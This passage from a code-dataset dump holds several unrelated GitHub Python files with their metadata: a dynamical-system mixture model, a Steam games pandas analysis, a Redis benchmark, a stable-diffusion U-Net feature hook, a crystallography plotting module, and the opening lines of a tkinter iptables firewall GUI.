x=state_means[t],\n mean=state_means[t-1],\n covariance=transition_covariance,\n mean_covariance=covariance\n )\n\n return expected_sequence_likelihood\n\n\ndef _assignment_entropy(responsibilities):\n \"\"\"\n entropy of posterior assignment estimate\n \"\"\"\n active_responsibilities = responsibilities[\n np.logical_not(np.isclose(responsibilities, 0))]\n assignment_entropy = -1 * \\\n (active_responsibilities * np.log(active_responsibilities)).sum()\n return assignment_entropy\n\n\ndef _state_sequence_entropy(state_covariances, pairwise_covariances):\n \"\"\"\n entropy of posterior state sequence estimate\n state_covariances: T x V x V covariance matrices for state estimates\n pairwise_covariances: T x V x V\n t-th entry covariance matrix for states at time t, t-1\n \"\"\"\n T = state_covariances.shape[0]\n state_sequence_entropy = 0\n state_sequence_entropy += \\\n multivariate_normal.entropy(cov=state_covariances[0])\n\n for t in range(1, T):\n # covariance of state at time t given state at time t-1\n covariance = state_covariances[t] - np.linalg.multi_dot([\n pairwise_covariances[t],\n state_covariances[t-1],\n pairwise_covariances[t]\n ])\n state_sequence_entropy += multivariate_normal.entropy(cov=covariance)\n\n return state_sequence_entropy\n\n\ndef _update_observation_covariance(data, state_means, state_covariances,\n responsibilities):\n \"\"\"\n observation covariance update for all filters\n \"\"\"\n N, T = data.shape[:2]\n K = responsibilities.shape[1]\n\n observation_covariance = 0\n for n in range(N):\n for k in range(K):\n for t in range(T):\n observation = data[n, t].reshape(-1, 1)\n state = state_means[k, t].reshape(-1, 1)\n yy = np.dot(observation, observation.T)\n xx = np.dot(state, state.T)\n xy = np.dot(state, observation.T)\n\n P = xx + state_covariances[k, t]\n\n observation_covariance += responsibilities[n, k] * (\n yy - xy - xy.T + P\n )\n observation_covariance = observation_covariance / (N * T)\n return observation_covariance\n\n\ndef _update_transition_covariances(transition_matrix, state_means,\n state_covariances, pairwise_covariances):\n\n return filtermethods._em_transition_covariance(\n transition_matrices=transition_matrix,\n transition_offsets=np.array([0]),\n smoothed_state_means=state_means,\n smoothed_state_covariances=state_covariances,\n pairwise_covariances=pairwise_covariances\n )\n\n\ndef _update_component_weights(responsibilities):\n component_weights = responsibilities.sum(axis=0) / responsibilities.sum()\n return component_weights\n\n\ndef _update_initial_state_means(state_means):\n # initial state distributions\n return state_means[:, 0]\n\n\ndef _update_initial_state_covariance(initial_state_mean, state_means,\n state_covariances):\n\n initial_state_covariance = filtermethods._em_initial_state_covariance(\n initial_state_mean=initial_state_mean,\n smoothed_state_means=state_means,\n smoothed_state_covariances=state_covariances\n )\n\n return initial_state_covariance\n\n\ndef _expected_normal_logpdf(x=None, mean=None, covariance=None, precision=None,\n mean_covariance=None):\n\n if precision is None:\n precision = np.linalg.pinv(covariance)\n\n expected_normal = 0\n expected_normal += \\\n multivariate_normal.logpdf(x=x, mean=mean, cov=covariance)\n expected_normal += -0.5 * np.trace(np.dot(\n np.linalg.pinv(covariance),\n mean_covariance\n ))\n return 
expected_normal\n","repo_name":"karltayeb/myc-analysis","sub_path":"develop/LDSMixture.py","file_name":"LDSMixture.py","file_ext":"py","file_size_in_byte":24854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33077520132","text":"import ast \nimport pandas as pd\nimport json\nfrom typing import Dict\n\nrows = []\nwith open ('steam_games.json') as f: # f contains the data of the archive\n for line in f.readlines():\n rows.append(ast.literal_eval(line))\ndf1 = pd.DataFrame(rows)\n\n# Change to NaT the data that is not in yyyy-mm-dd format\ndf1['release_date'] = pd.to_datetime(df1['release_date'], format='%Y-%m-%d', errors='coerce')\n\n#Do a filter in release date to drop NaN\ndff = df1.dropna(subset= ['release_date'])\n\n#Change to datetime the release date\ndff['release_date'] = pd.to_datetime(dff['release_date'])\n\n#Unnest the colum genres in the dataframe\ndf_anid = dff.explode('genres')\n\n \n\ndef get_genero(year: int):\n df = df_anid[['release_date','genres']]\n \n#Convert the time to datetime object.Then it converts the datetime object to period object with a yearly frequency\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n \n#Filter the selectiong the rows only when the period is equal to the year stored in the variable\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n df_top = df_filter['genres'].value_counts()\n top_genres = df_top.head(5)\n return {year: top_genres.to_dict()}\n\n#print(genero(2014))\n\n \ndef get_juegos(year: int):\n df = dff[['release_date','app_name']]\n#Convert the time to datetime object.Then it converts the datetime object to period object with a yearly frequency\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n \n#Filter the selectiong the rows only when the period is equal to the year stored in the variable\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n \n#Converted the column into a list,transform to string and contain it in the variable\n juegos_lanzados = df_filter['app_name'].astype(str).tolist()\n juegos_dict = {juego for juego in juegos_lanzados}\n return {year: juegos_dict}\n\n#print(juegos(2014))\n\ndef get_specs(year: int):\n df = dff[['release_date','specs']]\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n df_filter = df_filter.explode('specs')\n df_top = df_filter['specs'].value_counts()\n top_specs = df_top.head(5)\n return {year: top_specs.to_dict()}\n\n#print(specs(2014))\n\ndef get_earlyaccess(year: int):\n df = dff[['release_date','early_access']]\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = df[(df['release_date'].dt.to_period('Y') == years) & (df['early_access'] == True)] \n num_early_access = len(df_filter) #Count the number of rows with True\n return {year: num_early_access}\n\n#print(earlyaccess(2014))\n\ndef get_sentiment( year : int):\n dfs = dff[['sentiment','release_date']]\n \n #Use isin to created a boolean series that indicate the value of the column\n #The ~ operator is used to invert the boolean series. 
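The masking idiom that `get_sentiment` uses just below: `isin()` builds a boolean Series, `~` inverts it, and a single `.loc` assignment overwrites the unrecognised labels. A minimal sketch with toy data:

```python
import pandas as pd

df = pd.DataFrame({'sentiment': ['Positive', '3 user reviews', 'Mixed']})
known = ['Positive', 'Mixed', 'Negative']
df.loc[~df['sentiment'].isin(known), 'sentiment'] = 'None'  # rewrite non-labels in place
print(df)
```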
\n mask = ~dfs['sentiment'].isin(['Overwhelmingly Positive','Mostly Positive','Very Positive','Positive', 'Mixed', 'Negative','Mostly Negative','Very Negative','Overwhelmingly Negative'])\n \n #Select the rows where the mask is True and set that values in the column for None\n dfs.loc[mask, 'sentiment'] = 'None'\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = dfs[dfs['release_date'].dt.to_period('Y') == years] \n critics = df_filter['sentiment']\n num_critics = critics.value_counts() \n return {year: num_critics.to_dict()}\n\n#print(sentiment(2014))\n\ndef get_metascore(year: int):\n df = dff[['metascore','release_date','app_name']]\n # Filter the data to only include rows where the release date is in the specified year\n df_filtered = df[df['release_date'].dt.year == year]\n \n # Sort the rows by metascore in descending order\n df_sorted = df_filtered.sort_values(by='metascore', ascending=False)\n df_sorted['metascore'] = pd.to_numeric(df_sorted['metascore'], errors='coerce', downcast='integer')\n df_sorted['metascore'] = df_sorted['metascore'].fillna(0)\n \n # Get the names and metascores of the top 5 games\n top_games = df_sorted[['app_name', 'metascore']].head(5)\n \n # Convert the result to a dictionary\n result = top_games.set_index('app_name')['metascore'].apply(int).to_dict()\n \n return {year: result}\n\n#print(metascore(2014))\n\n\nimport pickle\n\nfrom pandas import to_numeric\n \ndef get_predict(year, early_access, sentiment, genre):\n # Load the saved model from a file\n with open('model_and_rmse.pkl', 'rb') as file:\n data = pickle.load(file)\n \n # Unpack the tuple and extract the model\n model, rmse_train, rmse_test = data\n \n # Create a list of all possible genres\n all_genres = ['Indie','Action','Adventure','Casual','Simulation',\n 'Strategy','RPG','Early Access','Free to Play','Sports','Massively Multiplayer']\n \n # Create a one-hot encoded representation of the input genre\n genre_encoded = [1 if g == genre else 0 for g in all_genres]\n \n # Create input data for prediction\n X = [[year, early_access, sentiment] + genre_encoded]\n \n # Make prediction\n y_pred = model.predict(X)\n \n # Return prediction as a scalar value\n return {'predict price': round(to_numeric(y_pred[0]), 2), 'rmse_train': rmse_train, 'rmse_test': rmse_test}\n\n\n\n#print(get_predict(2014,1,3,'Indie'))","repo_name":"LLozanoBaron/Project_MLops","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14124511809","text":"import asyncio\n\nimport uvloop\nimport zangy\n\nuvloop.install()\n\n\nasync def main():\n pool = await zangy.create_pool(\"redis://localhost\", 10, 0)\n futures = []\n for i in range(1000000):\n futures.append(pool.set(f\"bench{i}\", \"yes\"))\n await asyncio.gather(*futures)\n\n\nasyncio.run(main())\n","repo_name":"Gelbpunkt/zangy","sub_path":"bench/bench_zangy.py","file_name":"bench_zangy.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"92"} +{"seq_id":"998904464","text":"from typing import TYPE_CHECKING\n\nfrom torch import nn, Tensor\n\nfrom modules.processing import StableDiffusionProcessing\n\nfrom scripts.dumpunetlib import layerinfo\nfrom scripts.dumpunetlib.feature_extractor import FeatureExtractorBase\nfrom scripts.dumpunetlib.features.featureinfo import FeatureInfo\nfrom scripts.dumpunetlib.features.utils import 
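The zangy benchmark above materialises 1,000,000 pending futures before a single `asyncio.gather`, which is memory-hungry. A sketch of the same benchmark issued in bounded batches; `pool` is a zangy pool as created above, and the batch size is arbitrary:

```python
import asyncio

async def bench(pool, total=1_000_000, batch=10_000):
    # Issue the same one million SETs, but only `batch` in flight at a time.
    for start in range(0, total, batch):
        await asyncio.gather(*(pool.set(f"bench{i}", "yes")
                               for i in range(start, start + batch)))
```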
feature_to_grid_images, save_features\nfrom scripts.dumpunetlib.report import message as E\nfrom scripts.dumpunetlib.utils import *\nfrom scripts.dumpunetlib.colorizer import Colorizer\n\nif TYPE_CHECKING:\n from scripts.dumpunet import Script\n\nclass FeatureExtractor(FeatureExtractorBase[FeatureInfo]):\n \n def __init__(\n self,\n runner: \"Script\",\n enabled: bool,\n total_steps: int,\n layer_input: str,\n step_input: str,\n path: str|None,\n ):\n super().__init__(runner, enabled, total_steps, layer_input, step_input, path)\n \n def hook_unet(self, p: StableDiffusionProcessing, unet: nn.Module):\n \n #time_embed : nn.modules.container.Sequential\n #input_blocks : nn.modules.container.ModuleList\n #middle_block : ldm.modules.diffusionmodules.openaimodel.TimestepEmbedSequential\n #output_blocks : nn.modules.container.ModuleList\n #out_ : nn.modules.container.Sequential\n #time_embed = unet.time_embed\n #input_blocks = unet.input_blocks\n #middle_block = unet.middle_block\n #output_blocks = unet.output_blocks\n #out_ = unet.out\n #summary(unet, (4, 512, 512))\n \n def create_hook(layername: str):\n \n def forward_hook(module, inputs, outputs):\n if self.steps_on_batch in self.steps:\n self.log(f\"{self.steps_on_batch} {layername} {inputs[0].size()} {outputs.size()}\")\n \n images_per_batch = p.batch_size\n \n for image_index, output in enumerate(\n outputs.detach().clone()[:images_per_batch],\n (self.batch_num-1) * images_per_batch\n ):\n features = self.extracted_features[image_index][self.steps_on_batch]\n features.add(\n layername,\n FeatureInfo(\n [ x.size() for x in inputs if type(x) == Tensor ],\n output.size(),\n output\n )\n )\n return forward_hook\n \n for layer in self.layers:\n self.log(f\"U-Net: hooking {layer}...\")\n target = get_unet_layer(unet, layer)\n self.hook_layer(target, create_hook(layer))\n \n def feature_to_grid_images(self, feature: FeatureInfo, layer: str, img_idx: int, step: int, width: int, height: int, average_type: str|None, color: Colorizer):\n return feature_to_grid_images(feature, layer, width, height, average_type, color)\n \n def save_features(self, feature: FeatureInfo, layer: str, img_idx: int, step: int, width: int, height: int, path: str, basename: str):\n save_features(feature, path, basename)\n \ndef get_unet_layer(unet, layername: str) -> nn.modules.Module:\n idx = layerinfo.input_index(layername)\n if idx is not None:\n return unet.input_blocks[idx]\n \n idx = layerinfo.middle_index(layername)\n if idx is not None:\n return unet.middle_block\n \n idx = layerinfo.output_index(layername)\n if idx is not None:\n return unet.output_blocks[idx]\n \n raise ValueError(E(f\"Invalid layer name: {layername}\"))\n","repo_name":"hnmr293/stable-diffusion-webui-dumpunet","sub_path":"scripts/dumpunetlib/features/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"92"} +{"seq_id":"37052444455","text":"import os, collections\nimport numpy\nfrom libtbx import adopt_init_args\n\nfrom pandemic.adp import constants\n\n\nclass PandemicTrackingPlotter:\n\n _snapshots_png = 'tracking_snapshots.png'\n _level_convergence_png = 'tracking_convergence.png'\n _rmsds_convergence_png = 'tracking_rmsds.png'\n _delta_u_png_prefix = 'tracking_atoms'\n\n def __init__(self,\n parent,\n output_directory,\n plotting_object,\n ):\n\n output_files = collections.OrderedDict(\n snapshots = os.path.join(output_directory, self._snapshots_png),\n level_convergence = 
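`hook_unet` above uses PyTorch forward hooks: each hooked module calls back with `(module, inputs, outputs)`, and detached clones of the outputs are stashed per layer. The pattern in isolation, with an arbitrary layer and shapes:

```python
import torch
from torch import nn

features = {}

def make_hook(name):
    def hook(module, inputs, outputs):
        features[name] = outputs.detach().clone()  # snapshot without tracking gradients
    return hook

layer = nn.Linear(4, 2)
handle = layer.register_forward_hook(make_hook("fc"))
layer(torch.randn(3, 4))
print(features["fc"].shape)  # torch.Size([3, 2])
handle.remove()              # detach the hook when done
```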
os.path.join(output_directory, self._level_convergence_png),\n rmsds_convergence = os.path.join(output_directory, self._rmsds_convergence_png),\n model_changes = collections.OrderedDict(),\n )\n\n adopt_init_args(self, locals())\n\n def __call__(self):\n\n self.cycle_snapshot_plot(\n table = self.parent.table,\n filename = self.output_files['snapshots'],\n )\n\n self.level_convergence_plot(\n table = self.parent.table,\n filename = self.output_files['level_convergence']\n )\n\n self.rmsds_convergence_plot(\n table = self.parent.table_by_dataset,\n filename = self.output_files['rmsds_convergence'],\n )\n\n uij_delta_eigenvalues = self.parent.uij_history.get_delta_eigenvalues()\n\n of = self.delta_u_plots(\n delta_eigenvalues = uij_delta_eigenvalues.mean(axis=1),\n structure_factory = self.parent.structure_factory,\n prefix = os.path.join(self.output_directory, self._delta_u_png_prefix),\n )\n self.output_files['model_changes'] = of\n\n return self.output_files\n\n def cycle_snapshot_plot(self,\n table,\n filename,\n number_to_plot=5,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n start_cycle = min(table['cycle'])\n n = max(table['cycle'])\n # trim the table to certain rows\n cycles_to_plot = range(start_cycle, n, int(n/number_to_plot)+1) + [n]\n cycles_to_plot_bool = table['cycle'].isin(cycles_to_plot)\n table = table[cycles_to_plot_bool]\n\n # Group by cycle & step to allow stacking\n grouped = table.groupby(['cycle','step'], sort=False, as_index=False)\n n_total = len(grouped)\n grouped_reduced = grouped.max()\n grouped_reduced['x'] = range(len(grouped_reduced))\n\n # Previous cycle variables for connecting lines\n prev_x = prev_r = prev_b = None\n\n # Setup plot and plot args - do in convoluted way to allow hiding of x-ticks\n # fig, axes = pyplot.subplots(nrows=2, ncols=1, sharex=True, sharey=False)\n # axes = numpy.array(axes).flatten() # Creates list if only one plot\n fig = pyplot.figure()\n ax1 = fig.add_subplot(2,1,1)\n ax2 = fig.add_subplot(2,1,2, sharex=ax1)\n axes = [ax1, ax2]\n\n # Get ls/ms outside of loop\n lw = helper.lw(grouped.ngroups)\n ms = helper.ms(grouped.ngroups)\n\n # Iterate through the cycles\n for n_cycle, cycle_info in grouped_reduced.groupby('cycle', sort=False):\n\n x_vals = cycle_info['x'].values\n r_vals = cycle_info['rmsd'].values\n b_vals = cycle_info['b_avg (total)'].values\n\n # Create RMSD plot\n hdl1 = axes[0].plot(\n x_vals, r_vals, 'bo-',\n label = 'rmsd',\n linewidth = lw, markersize = ms,\n )\n if prev_x is not None:\n axes[0].plot(\n [prev_x, x_vals[0]], [prev_r, r_vals[0]], 'b:',\n label = 'rmsd',\n linewidth = lw, markersize = ms,\n )\n # Create an overall B-iso TOTAL line\n hdl2 = axes[1].plot(\n x_vals, b_vals, 'ko-',\n label = 'total',\n linewidth = lw, markersize = ms,\n )\n if prev_x is not None:\n axes[1].plot(\n [prev_x, x_vals[0]], [prev_b, b_vals[0]], 'k:',\n label = 'total',\n linewidth = lw, markersize = ms,\n )\n\n prev_x = x_vals[-1]\n prev_r = r_vals[-1]\n prev_b = b_vals[-1]\n\n # Other plot -- done as one\n\n x_vals = numpy.arange(0, grouped.ngroups)\n x_keys = [v[0] for v in grouped] # remove\n x_labs = [v[1] for v in x_keys] # remove\n\n # Create B-iso lines for each LEVEL\n colours = self.plotting_object.get_level_colours()\n # handles for figure legend (NOT axis legend)\n figure_legend_handles = []\n\n # Bottoms of bar where stacking occurs\n y_cuml = numpy.zeros(len(x_vals))\n # Iterate through the levels and plot cumulative bars\n for lvl_no in 
sorted(set(table['level#'])):\n if lvl_no is None: continue\n assert isinstance(lvl_no, int)\n # Get values\n sel = (table['level#'] == lvl_no)\n sel_t = table[sel]\n lvl_name = sel_t['level'].values[0]\n\n # The indices of the x-axis positions\n i_x = [x_keys.index(v) for v in map(tuple,sel_t[['cycle','step']].values.tolist())]\n # Extract y_vals\n y_vals = sel_t['b_avg'].values\n\n # Plot\n hdl = axes[1].bar(\n x = x_vals[i_x],\n height = y_vals,\n bottom = y_cuml[i_x],\n width = 0.8,\n color = colours[lvl_no-1],\n edgecolor = 'k',\n linewidth = 0.5,\n align = 'center',\n label = '{}: {}'.format(lvl_no, lvl_name),\n )\n figure_legend_handles.append(hdl)\n # Add to cuml\n y_cuml[i_x] = y_cuml[i_x] + y_vals\n\n #\n # Axis stuff\n #\n # 1\n ax = axes[0]\n # ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Model Fit',\n x_label = None,\n y_label = 'Model fit\\n($\\AA^2$)',\n )\n helper.hide_x_labels(axis=ax)\n #ax.set_ylim(bottom=0.0)\n ax.set_yscale('log')\n #\n # 2\n ax = axes[1]\n #ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Model B-factors',\n x_label = 'Optimisation Stage/Cycle',\n y_label = 'Isotropic B\\n($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_vals,\n x_tick_labels = x_labs,\n n_labels = 20,\n )\n helper.rotate_x_tick_labels(axis=ax)\n ax.set_xlim(left=-0.5, right=max(x_vals)+0.5)\n ax.set_ylim(bottom=0.0)\n\n # Add legend to first graph for both lines\n lgd0a = axes[0].legend(handles=hdl1, bbox_to_anchor=(1.02, 0.95), loc=2, borderaxespad=0.)\n lgd0b = axes[1].legend(handles=hdl2, bbox_to_anchor=(1.02, 0.95), loc=2, borderaxespad=0.)\n\n # BOTH AXES -- Add vertical lines between macro-cycles\n start_x = x_vals[[x_keys.index(v[:2]) for v in map(tuple,table[['cycle','step','level#']].values.tolist()) if v[1]=='start' and v[2]==1]]\n n_cycles = len(start_x)\n x_max = max(x_vals)\n last_v = delta = None\n for i, v in enumerate(start_x - 0.5):\n # Dashed lines to separate cycles\n if (v > 0) and (v < x_max):\n for ax in axes:\n ax.axvline(x=v, linewidth=1, zorder=1, color='k', linestyle='--')\n # Text to label each cycle\n if (last_v is not None):\n delta = v - last_v\n axes[0].text(\n x = last_v+delta/2.0,\n y = 0.1*axes[0].get_ylim()[0] + 0.9*axes[0].get_ylim()[1],\n s = 'cycle '*(n_cycles<6) +str(cycles_to_plot[i-1]), # This is plotting the previous point so need -1\n horizontalalignment = 'center',\n verticalalignment = 'top',\n )\n last_v = v\n # Plot the last point (or do nothing for 1 cycle)\n if delta is not None:\n axes[0].text(\n x = min(v+delta/2.0, axes[0].get_xlim()[1]),\n y = 0.1*axes[0].get_ylim()[0] + 0.9*axes[0].get_ylim()[1],\n s = 'cycle '*(n_cycles<6) +str(cycles_to_plot[i]), # This does not need a -1\n horizontalalignment = 'center',\n verticalalignment = 'top',\n )\n\n # Create legend\n lgd1 = fig.legend(\n handles=figure_legend_handles, ncol=3,\n bbox_to_anchor=(0.5, 0.0),\n bbox_transform=fig.transFigure,\n loc=9, borderaxespad=0.,\n )\n\n helper.write_and_close_fig(\n fig=fig,\n filename=filename,\n bbox_extra_artists=[lgd0a,lgd0b,lgd1],\n )\n\n def level_convergence_plot(self,\n table,\n filename,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n # fig, axes = pyplot.subplots(nrows=2, ncols=1, sharex=True, sharey=False)\n # axes = numpy.array(axes).flatten() # Creates list if only one plot\n fig = pyplot.figure()\n ax1 = fig.add_subplot(2,1,1)\n ax2 = fig.add_subplot(2,2,3)\n ax3 = 
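Both plotting methods here stack per-level bars by carrying a running `y_cuml` of bar bottoms. The idiom reduced to a minimal matplotlib sketch; the data and output filename are illustrative:

```python
import numpy as np
from matplotlib import pyplot

x = np.arange(4)
levels = {'level 1': np.array([1.0, 2.0, 1.0, 3.0]),
          'level 2': np.array([2.0, 1.0, 2.0, 1.0])}

fig, ax = pyplot.subplots()
y_cuml = np.zeros(len(x))                      # bottoms for the next level's bars
for name, heights in levels.items():
    ax.bar(x, heights, bottom=y_cuml, label=name, edgecolor='k', linewidth=0.5)
    y_cuml += heights                          # stack the next level on top
ax.legend()
fig.savefig('stacked.png')
```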
fig.add_subplot(2,2,4, sharex=ax2)\n axes = [ax1, ax2, ax3]\n\n # Extract only end-of-cycle optimisation values (last step of each cycle)\n table = table[(table['step']=='end')]\n # Labels for each of the series to plot\n m_cyc = 0 if (len(table) == 0) else min(table['cycle'])\n labels = table[table['cycle']==m_cyc]['level'].values\n # Extract common list of x-values\n x_keys = sorted(set(table['cycle'].values))\n x_vals = numpy.array(x_keys)\n\n # Colours for each level\n colours = self.plotting_object.get_level_colours()\n # List of handles for figure legend (NOT axis legend)\n figure_legend_handles = []\n\n ########################\n # FIRST AXIS\n ########################\n ax = axes[0]\n # Cumulative y-values for stacking\n y_cuml = numpy.zeros(len(x_vals))\n # Plot same values as stacked bars\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n i_x = [x_keys.index(v) for v in l_table['cycle'].values]\n y_vals = l_table['b_avg'].values\n # Plot stacked bar\n hdl = ax.bar(\n x = x_vals[i_x],\n height = y_vals,\n bottom = y_cuml[i_x],\n width = 1.0,\n color = colours[l_no-1],\n edgecolor = 'k',\n linewidth = 0.5,\n align = 'center',\n label = '{}: {}'.format(l_no, l_name),\n )\n figure_legend_handles.append(hdl)\n # Add to cuml\n y_cuml[i_x] = y_cuml[i_x] + y_vals\n\n ########################\n # SECOND AXIS\n ########################\n ax = axes[1]\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n x_vals = l_table['cycle'].values\n y_vals = l_table['b_avg'].values\n nx = len(x_vals)\n\n hdl_ = ax.plot(\n x_vals, y_vals, 'ko-',\n linewidth = helper.lw(nx, 'chunky'),\n markersize = helper.ms(nx, 'chunky'),\n )\n hdl_ = ax.plot(\n x_vals, y_vals, 'o-',\n linewidth = helper.lw(nx, 'narrow'),\n markersize = helper.ms(nx, 'narrow'),\n color = colours[l_no-1],\n label = '{}: {}'.format(l_no, l_name),\n )\n\n ########################\n # THIRD AXIS\n ########################\n ax = axes[2]\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n x_vals = l_table['cycle'].values\n plot_vals = l_table['b_avg'].values\n y_vals = numpy.concatenate(([plot_vals[0]], plot_vals[1:]-plot_vals[:-1]))\n nx = len(x_vals)\n\n hdl_ = ax.plot(\n x_vals, y_vals, 'ko-',\n linewidth = helper.lw(nx, 'chunky'),\n markersize = helper.ms(nx, 'chunky'),\n )\n hdl_ = ax.plot(\n x_vals, y_vals, 'o-',\n linewidth = helper.lw(nx, 'narrow'),\n markersize = helper.ms(nx, 'narrow'),\n color = colours[l_no-1],\n label = '{}: {}'.format(l_no, l_name),\n )\n\n #\n # Axis stuff\n #\n # 1\n ax = axes[0]\n #ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Total B-factors',\n x_label = 'Optimisation Cycle',\n y_label = 'B-factor ($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_keys,\n n_labels = 20,\n )\n ax.set_ylim(bottom=0.0)\n #\n # 2\n ax = axes[1]\n helper.set_axis_labels(\n axis = ax,\n title = 'Level B-factors',\n x_label = 'Optimisation Cycle',\n y_label = 'B-factor ($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_keys,\n n_labels = 5,\n )\n ax.set_ylim(bottom=0.0)\n #\n # 3\n ax = axes[2]\n helper.set_axis_labels(\n axis = 
ax,\n title ='Changes between cycles',\n x_label = 'Optimisation Cycle',\n y_label = None,\n )\n ax.set_yscale('symlog', linthreshy=0.1)\n\n # Create legend\n lgd = fig.legend(\n handles=figure_legend_handles, ncol=3,\n bbox_to_anchor=(0.5, 0.0),\n bbox_transform=fig.transFigure,\n loc=9, borderaxespad=0.,\n )\n\n helper.write_and_close_fig(\n fig=fig,\n filename=filename,\n bbox_extra_artists=[lgd],\n )\n\n def rmsds_convergence_plot(self,\n table,\n filename,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n # Filter the given table\n tmp_table = table[(table['type'] == 'rmsd')]\n # Extract x- and y-values\n x_vals = tmp_table['cycle'].values\n y_vals = tmp_table['overall'].values\n # Calculate the differences between the values\n y_vals_delta = numpy.concatenate(([0.0], y_vals[1:]-y_vals[:-1]))\n # Convert to list?\n\n nx = len(x_vals)\n\n fig, (ax1, ax2) = pyplot.subplots(nrows=2, ncols=1)\n\n # t = fig.suptitle(\n # 'Model fit during optimisation',\n # y = 1.00,\n # verticalalignment='bottom',\n # )\n\n _fig, _axis = self.plotting_object.lineplot(\n axis = ax1,\n x_vals = x_vals,\n y_vals = y_vals,\n title = 'RMSD to target values',\n x_label = 'Cycle',\n y_label = 'RMSD (B-factor; $\\AA^2$)',\n x_ticks = x_vals,\n legends = ['rmsd'],\n filename = None, # returns fig and axis\n legend_kw_args = {'bbox_to_anchor':(1.0, 1.0), 'loc':4, 'borderaxespad':0.5},\n background_line_type = 'chunky',\n )\n\n _fig, _axis = self.plotting_object.lineplot(\n axis = ax2,\n x_vals = x_vals,\n y_vals = y_vals_delta,\n title = 'RMSD change from previous cycle',\n x_label = 'Cycle',\n y_label = 'RMSD (B-factor; $\\AA^2$)',\n x_ticks = x_vals,\n legends = ['$\\Delta$ rmsd'],\n filename = None, # returns fig and axis\n legend_kw_args = {'bbox_to_anchor':(1.0, 1.0), 'loc':4, 'borderaxespad':0.5},\n background_line_type = 'chunky',\n )\n\n # Set log-scale when there are non-zero values\n if len(y_vals) and (numpy.min(y_vals) > 0.0):\n # Set one log-scale above and below\n y_min = 10**numpy.floor(numpy.log10(numpy.min(y_vals)))\n y_max = 10**numpy.ceil(numpy.log10(numpy.max(y_vals)))\n ax1.set_ylim((y_min, y_max))\n ax1.set_yscale('log')\n # Just set sym log for delta plot\n ax2.set_yscale('symlog', linthreshy=0.001)\n\n helper.write_and_close_fig(\n fig = fig,\n filename = filename,\n )\n\n return\n\n def delta_u_plots(self,\n delta_eigenvalues,\n structure_factory,\n prefix,\n ):\n\n helper = self.parent.plotting_object.helper\n\n #delta_max_sel = numpy.argmax(numpy.abs(delta_eigenvalues), axis=-1)\n #delta_indices = tuple(numpy.indices(delta_eigenvalues.shape[:-1])) + (delta_max_sel, )\n #delta_b = constants.EIGHTPISQ * delta_eigenvalues[delta_indices]\n delta_b = constants.EIGHTPISQ * delta_eigenvalues.mean(axis=-1)\n\n hierarchies = [structure_factory.custom_copy(iso=db, blank_copy=False) for db in delta_b]\n\n of = self.plotting_object.multi_hierarchy_plot_by_residue(\n hierarchies = hierarchies,\n plot_function = self.plotting_object.lineplot,\n plot_kw_args = dict(\n title = 'Changes over last cycle',\n x_label = 'Residue',\n y_label = 'B-factor Changes ($\\AA^2$)',\n legends = self.parent.level_names,\n marker = 'o',\n legend_kw_args = dict(ncol=3, bbox_to_anchor=(0.5, 1.1), loc=8, borderaxespad=0.),\n ),\n prefix = prefix,\n residue_values_function = numpy.mean, #max?\n y_array_values_function = None,\n )\n\n return 
of\n","repo_name":"tjlane/pandda","sub_path":"lib-python/pandemic/adp/tracking/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":18776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19912991096","text":"from tkinter import *\nimport subprocess\nfrom tkinter.messagebox import askyesno, showwarning, showinfo\nimport iptc\n\nauto_nat_color = 'lightblue'\ndeny_forward_color = 'lightblue'\ndeny_ping_color = 'lightblue'\ndeny_scan_color = 'lightblue'\ndeny_flooding_color = 'lightblue'\ndrop_fragments_color = 'lightblue'\ndrop_XMAS_color = 'lightblue'\ndrop_null_color = 'lightblue'\ndrop_multirst_color = 'lightblue'\ndrop_invalid_color = 'lightblue'\n\n\nclass MY_IP_GUI():\n def __init__(self, iptables_window):\n self.iptables_window = iptables_window\n\n def set_IP_window(self):\n self.iptables_window.title(\"Iptables Firewall\") # 窗口名\n self.iptables_window.geometry('640x420+470+260')\n self.iptables_window[\"bg\"] = \"PaleGoldenrod\"\n self.frame_top = Frame(self.iptables_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.iptables_button = 